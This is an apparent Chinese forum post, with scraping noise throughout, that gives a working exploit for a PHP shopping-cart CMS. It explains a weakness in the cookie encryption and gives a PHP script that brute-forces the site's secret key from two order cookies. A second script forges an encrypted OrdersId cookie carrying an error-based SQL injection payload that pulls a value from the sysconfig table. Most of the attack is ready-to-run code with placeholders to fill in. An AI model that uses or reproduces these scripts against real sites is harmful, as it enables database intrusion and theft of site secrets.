www.xxx.com/plus/search.php?keyword=
6 x0 l0 A% \/ x# E在 include/shopcar.class.php中% M% `' W$ S( F: B9 Z2 u: Y
先看一下这个shopcar类是如何生成cookie的
8 E- i' y. S3 T4 ~" v239 function saveCookie($key,$value)
4 z. r3 |4 b9 e! B a# m* U240 {7 }, o- ]6 f* `- H
241 if(is_array($value)). I& S7 z9 A! `* T+ l* m
242 {
& H1 Z# Z8 @, D243 $value = $this->enCrypt($this->enCode($value));
' [/ R. z, F* g" V: B244 }* s2 C# v) N7 J
245 else
' u- P7 J/ f& {5 T: |246 {3 x# X% e! w. y- f3 M. V5 e' S
247 $value = $this->enCrypt($value);
6 K5 x7 h+ a7 x248 }/ e4 T# ]# k% n% H5 Z% P
249 setcookie($key,$value,time()+36000,’/');
( g2 ^; Y6 E N0 k- e$ z. ]250 }
4 S6 R3 B; h @简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数- d. n7 O3 H L" I# R- p6 n2 O
186 function enCrypt($txt): I$ u$ I7 Z% w& w
187 {( p$ f% i% Q ^4 ?
188 srand((double)microtime() * 1000000);( n, t9 J+ Y9 z1 Z) C# S
189 $encrypt_key = md5(rand(0, 32000));
/ n) q% f/ l$ T* ?190 $ctr = 0;
# K+ M- I B" X1 L) i* }191 $tmp = ”;
+ H) g9 D1 n% Q7 m' V2 v192 for($i = 0; $i < strlen($txt); $i++)) I# s" d W: S) [" t" a
193 {
" d6 P$ x) ~/ {3 n" h& E+ L194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 D. y' l% U _% A8 u+ h* p195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);: ~3 q$ p% J6 B; k
196 }
8 C: l! X$ P# ~- ]197 return base64_encode($this->setKey($tmp));
. C+ [7 i, O2 P& `1 B) l198 }
# p# G5 d% D; A) a/ m2 {213 function setKey($txt)* y2 o- Q2 i) `. `4 U+ h
214 {* j. ?3 p5 x0 i* j* a/ P& J. G7 ?
215 global $cfg_cookie_encode;$ n' u0 J+ p) D) D0 `0 r
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));: f5 M `9 q5 b. m. ?& `
217 $ctr = 0;
; m. R' k/ S6 {; ?$ A& ]0 S+ H218 $tmp = ”;
; t8 Y; J8 T" j# e) F+ a: W- e+ Q219 for($i = 0; $i < strlen($txt); $i++)& ^7 R! N8 `4 A9 P, Y& S( A6 K
220 {! c U2 ?7 Y( X7 ~8 v
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
+ F1 B2 P3 O9 t% C+ y% Y9 [222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];; f; D8 F# C6 |/ d3 k. U2 g6 G
223 }
3 X9 Z7 c1 ^' M6 U2 j224 return $tmp;
% o/ J/ E6 L7 L, N3 ~225 }% T6 P4 }' V5 s! g
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的! w; R. J: E7 N' e
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
4 z2 {9 c& d8 v3 ?6 w$ u. m# ]具体代码如下:& h9 |8 j# ~5 Z' @
<?php
! M5 t2 X" o( j) p R$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
- ]' L- n$ ] v% @) y" t$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
2 F2 O1 j3 w8 B1 z8 Y; n1 S, {$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
9 ]( }! \- d+ z6 D& M' y( Y7 O7 Nfunction reStrCode($code,$string)% k6 I1 A0 Z% e+ _
{
7 z" Q0 O) b, |5 Z6 t, S$code = base64_decode($code);
2 _% o3 Q _) i9 ]$key = “”;
2 O* A# [+ d( p6 z% B! }for($i=0 ; $i<32 ; $i++)
! p1 S: e U9 q- E' u: J$ I3 N{
9 r5 W7 @; V$ X8 z$key .= $string[$i] ^ $code[$i];
! w. A3 {$ G# P' E}, G3 h- D1 j0 C' D _7 ~
return $key;9 {( t1 j6 r& @+ J- H) R! j
}4 C" m' l F9 |! R2 U% \. s
function getKeys($cookie,$plantxt)
0 I( ?0 D' z/ P- ^9 C; C0 P{7 X! v$ ~ X. W2 p( P# Z1 c; x
$tmp = $cookie;
9 }+ P# e0 n& |; i" _1 B5 g$results = array();2 _9 j# \! s9 J6 n
for($j=0 ; $j < 32000; $j++), b/ q/ S- y! I
{
4 R, k2 S, b" `5 c0 ^4 Y7 k) U
! `2 S! _' M! ^ j$txt = $plantxt;: i) X$ Q; F$ g9 Q. C* {( T% Q, o# T
$ctr = 0;6 t* B9 |" ], |/ c0 R6 p
$tmp = ”;) T( @8 W9 T$ B% N) G
$encrypt_key = md5($j);5 N( D E2 ?. K) E( _) Q: c
for($i =0; $i < strlen($txt); $i ++)! m# \+ ^! C( \
{
0 O' O6 x H# n& y$ D) J8 z9 s$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( r7 z9 c+ |7 j( x
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 i/ f5 h# w/ }}0 _3 A' A! V* U) ^1 Y6 Z! l
$string = $tmp;
) q- y4 O) \- n A$code = $cookie;
, _, {* U9 O9 k8 b$result = reStrCode($code,$string);$ L1 r9 r6 j& x* k ]! a" s- M
if(eregi(‘^[a-z0-9]+$’,$result))( |" a+ |& X1 h6 t8 V" Y5 ?) Y
{' u/ L5 E5 } G/ e" L5 U, _
echo $result.”\n”;! [, D: T( J# Z ~$ n
$results[] = $result;* ]+ X& |1 d# D" A, [8 I
}
9 o l* ~$ U8 n8 [& h: H}, m2 s0 H* w7 z8 K7 D6 n
return $results;1 o1 V3 f3 b! s6 i
}
. m% k- h# P- U4 q7 \, z$results1 = getKeys($cookie1,$plantxt);
" }: Y4 e0 k. `' u A5 @) h$results2 = getKeys($cookie2,$plantxt);
3 N+ i5 P% x2 T$ ~' Q1 A0 |: i( Fprint “\n——————–real key————————–\n”;
6 g$ H$ _# C$ z/ z9 H; Y8 oforeach($results1 as $test1)4 H: k2 r( |: J0 M6 n# f, v
{
+ a/ v4 S% Q1 l7 K2 {" gforeach($results2 as $test2)6 d2 M/ G0 F: h: G# _* J6 z
{
- U, R: V5 {9 c8 t9 c$ P4 _if($test1 == $test2)
& I0 L& ^3 V/ E3 I. G{
2 D, p( w8 S9 W. s, Z2 r9 a5 oecho $test1.”\n”;
/ r S. W% Y* \; s( g9 S |# w/ c}$ ` m' L' I: g( G F: F& E
}) M3 }+ r9 g3 w+ \3 [4 d
}+ [ s, I5 v7 ? d* w, u
?>1 {/ n2 i/ q' t) H6 e, w3 n
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
% V2 \% [( D( K5 |+ y# Dplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1' A4 B& b; \5 j; s* l
然后推算出md5(strtolower($cfg_cookie_encode))
# Z+ W+ Q* f( h) T; z0 F+ E得到这个key之后,我们就可以构造任意购物车的cookie
% B9 }, V0 {+ z- G2 d2 {) r接着看
( k% q, h1 I3 } b+ R4 D) k20 class MemberShops
* `& h! b0 B: F- V% Y21 {
2 { n4 `6 f6 y2 K22 var $OrdersId;
7 G$ c$ w, M0 X$ g23 var $productsId;
* @" Q! Y& Y2 h24
2 ~: A% a: i7 P. q, x25 function __construct(): Q, A- ^& }9 D) l! I
26 {
2 a; w7 Y* X9 ]) ?! a, X27 $this->OrdersId = $this->getCookie(“OrdersId”);
! }3 _$ \2 K) P7 i5 G7 J6 G" p28 if(empty($this->OrdersId))
1 J5 ]9 \: Z+ s; _29 {9 g7 l& e( l( ^' ^ i
30 $this->OrdersId = $this->MakeOrders();
r9 N* e& q8 z6 M6 _* g( b* N31 }
3 p; X0 d8 E0 J: ~32 }( a: ]; I. C, e3 C! t
发现OrderId是从cookie里面获取的! E+ z+ o6 i1 C
然后: Z2 d8 u8 X: m
/plus/carbuyaction.php中的* ]8 ^. W7 P/ U$ U
29 $cart = new MemberShops();( Q2 |$ a1 ^. c8 Y0 N9 h
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
/ U4 v; ]6 o8 q: q1 q- _……
9 ]3 M8 F3 d& M" C* }1 D$ L173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);7 x% d) L- H4 C' ?9 F
接着我们就可以注入了1 M* L7 E/ j b% `: S
通过利用下面代码生成cookie:
( m& @0 i) I& E4 v. \: M<?php- M, D& Z- R; A6 ]+ Y! {1 w
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;; p) a# W- E! A' P6 [
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
+ B6 j. k3 p* c! D0 ]function setKey($txt)
& B) F7 @6 m( x0 }' m{
0 ` N: e% O1 }- A( n) D- jglobal $encrypt_key;* a! `, i1 v' c2 c$ y" R) j/ J
$ctr = 0;- s% r0 D& z. l- \9 e5 y0 \9 h
$tmp = ”;% Z/ R f$ [2 S, ~7 C3 |
for($i = 0; $i < strlen($txt); $i++)) c' r) J! P1 v/ w+ B# M2 p4 U
{
1 b) d* s$ I% T$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ j! A$ R' v3 c8 E2 ~' E# N0 h" U$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];8 ?6 A4 j2 V8 Y- S9 n) Q
}
; M# ]0 A6 e( ~8 s: Sreturn $tmp;
) y% W' l: i6 l" d}
5 J& e: U, Z, tfunction enCrypt($txt)* `9 r9 q2 \6 T) j
{
6 O8 f* v7 E2 y- |* Nsrand((double)microtime() * 1000000);7 J0 P; X Q: @ o% Q
$encrypt_key = md5(rand(0, 32000));, | P6 S M, ^" K( t* l) p
$ctr = 0;
! \/ K) n1 c0 _% L$ ?: u9 m$tmp = ”;) ?. k R6 i% v3 a! D
for($i = 0; $i < strlen($txt); $i++)& R' F: L5 s; n: x5 C s3 I
{
+ z5 |" Y/ t& a3 }' n1 ^$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;! a( P; J7 Z: f6 z! c9 k' g; v
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
% o+ W3 d& k: o8 O}
7 S: ]4 Z% r. S6 ~return base64_encode(setKey($tmp));% c7 |. B% z+ r- v( n
}. r; j$ p9 h2 Z9 I- F' Y
for($dest =0;$dest = enCrypt($txt);)
8 G$ B9 q! V" e7 Y1 o{- Y" g: F: z/ K, L$ a8 A+ ?$ {& n
if(!strpos($dest,’+'))
0 d6 }# M8 r/ n; U. j6 D- m{# Y2 t% D( q: \- W3 C% F; J4 [
break;
# s7 b. V& p' K. B}
r' e) k' l) _. A6 f}
4 a1 k$ i) X' Hecho $dest.”\n”;
7 K6 T; ~$ [9 ]4 k# a?>+ d9 k: i) e4 v4 h# G
0 b& C7 X; U0 t |
发表于 2013-2-13 23:58:29
收藏
支持
反对